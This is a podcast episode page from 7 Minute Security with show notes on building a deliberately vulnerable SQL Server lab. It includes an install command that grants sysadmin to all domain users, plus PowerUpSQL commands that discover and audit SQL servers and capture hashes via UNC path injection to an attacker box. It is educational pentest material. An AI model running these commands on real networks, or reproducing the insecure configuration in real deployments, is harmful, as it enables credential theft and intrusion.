Podbean logo
  • Discover
  • Podcast Features

    Your all-in-one podcasting solution.
    Blog to Podcast

    Turn your blog into an engaging podcast.
  • Livestream

    High-performing audio live, without limits.
    Podcast Studio

    Easy-to-use audio recorder app.
  • Podbean AI

    AI-Enhanced Audio Quality and Content Generation.
    Podcast App

    The best podcast player & podcast app.
  • Ads Marketplace

    Join Ads Marketplace to earn money
    through sponsorship on your podcast.
    PodAds

    Manage your ads with dynamic ad insertion capability.
  • Apple Podcasts Subscriptions Integration

    Effortlessly publish and manage exclusive episodes for your
    Apple Podcasts subscribers directly from Podbean.

  • Live Streaming

    Receive livestream rewards from your audience and earn
    recurring income from your Fan Club membership.

  • All Arts Business Comedy Education
  • Fiction Government Health & Fitness History Kids & Family
  • Leisure Music News Religion & Spirituality Science
  • Society & Culture Sports Technology True Crime TV & Film
  • Live
  • How to Start a Podcast
  • How to Start a Live Podcast
  • How to Monetize a podcast
  • How to Promote Your Podcast
  • How to Use Group Recording
  • Log in
  • Start your podcast for free
  • Podcasting
    • Podcast Features
    • Livestream
    • Podbean AI
    • Blog to Podcast
    • Podcast Studio
    • Podcast App
  • Monetization
    • Ads Marketplace
    • Apple Podcasts Subscriptions Integration
    • Live Streaming
    • PodAds
  • Advertisers
  • Enterprise
  • Pricing
  • Discover
    • Log in
    Sign up free
7 Minute Security

7 Minute Security

Technology

7MS #567: How to Build an Intentionally Vulnerable SQL Server

7MS #567: How to Build an Intentionally Vulnerable SQL Server

2023-04-14
Download Right click and do "save link as"

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

  • Download SQL Server here

  • Install SQL via config .ini file

  • Or, install SQL via pure command line

  • Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users"
  • Run PowerUpSQL to find vulnerable SQL servers:
$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
  • Audit the discovered SQL servers:
Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose
  • Fire off stored procedures to catch hashes!
Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX
view more

More Episodes

7MS #487: Light Pentest eBook Announcement!
2021-09-28
7MS #486: Interview with Matt Quammen of Blue Team Alpha
2021-09-22
7MS #485: Interview with Christopher Fielder
2021-09-15
7MS #484: Desperately Seeking a Super SIEM for SMBs - Part 3
2021-09-08
7MS #483: Desperately Seeking a Super SIEM for SMBs - Part 2
2021-09-01
7MS #482: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 3
2021-08-26
7MS #481: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 2
2021-08-19
7MS #480: Desperately Seeking a Super SIEM for SMBs
2021-08-12
7MS #479: A Prelude to PwnTown
2021-08-06
7MS #478: Password Cracking in the Cloud - Part 4
2021-07-29
7MS #477: Cobalt Strike for Newbs
2021-07-21
7MS #476: Tales of Pentest Pwnage - Part 28
2021-07-16
7MS #475: Tales of Internal Network Pentest Pwnage - Part 27
2021-07-08
7MS #474: Password Cracking in the Cloud - Part 3
2021-06-30
7MS #473: Interview with Nikhil Mittal
2021-06-24
7MS #472: Interview with Christopher Fielder
2021-06-16
7MS #471: Cyber News - Ransomware Should Run Somewhere Edition
2021-06-09
7MS #470: First Impressions of Meraki Networking Gear
2021-06-02
7MS #469: Interview with Philippe Humeau of CrowdSec
2021-05-26
7MS #468: Eating the Security Dog Food - Part 3
2021-05-20
  • ←
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • →
012345678910111213141516171819

Get this podcast on your
phone, FREE

Download Podbean app on App Store Download Podbean app on Google Play

Create your
podcast in
minutes

  • Full-featured podcast site
  • Unlimited storage and bandwidth
  • Comprehensive podcast stats
  • Distribute to Apple Podcasts, Spotify, and more
  • Make money with your podcast
Get started

It is Free

  • Podcast Services

    • Podcast Features
    • Pricing
    • Enterprise Solution
    • Private Podcast
    • The Podcast App
    • Live Stream
    • Audio Recorder
    • Remote Recording
    • Podbean AI
  •  
    • Create a Podcast
    • Video Podcast
    • Start Podcasting
    • Start Radio Talk Show
    • Education Podcast
    • Church Podcast
    • Nonprofit Podcast
    • Get Sermons Online
    • Free Audiobooks

  • MONETIZATION & MORE

    • Podcast Advertising
    • Dynamic Ads Insertion
    • Apple Podcasts Subscriptions
    • Switch to Podbean
    • YouTube to Podcast
    • Blog to Podcast
    • Submit Your Podcast
    • Podbean Plugins
    • Developers

  • KNOWLEDGE BASE

    • How to Start a Podcast
    • How to Start a Live Podcast
    • How to Monetize a Podcast
    • How to Promote Your Podcast
    • Mobile Podcast Recording Guide
    • How to Use Group Recording
    • Podcast Advertising 101

  • Support

    • Support Center
    • What’s New
    • Free Webinars
    • Podcast Events
    • Podbean Academy
    • Podcasting Smarter
    • Badges
    • Resources

  • Podbean

    • About Us
    • Podbean Blog
    • Careers
    • Press and Media
    • Green Initiative
    • Affiliate Program
    • Contact Us
  • Privacy Policy
  • Cookie Policy
  • Terms of Use
  • Consent Preferences
  • Copyright © 2015-2024 Podbean.com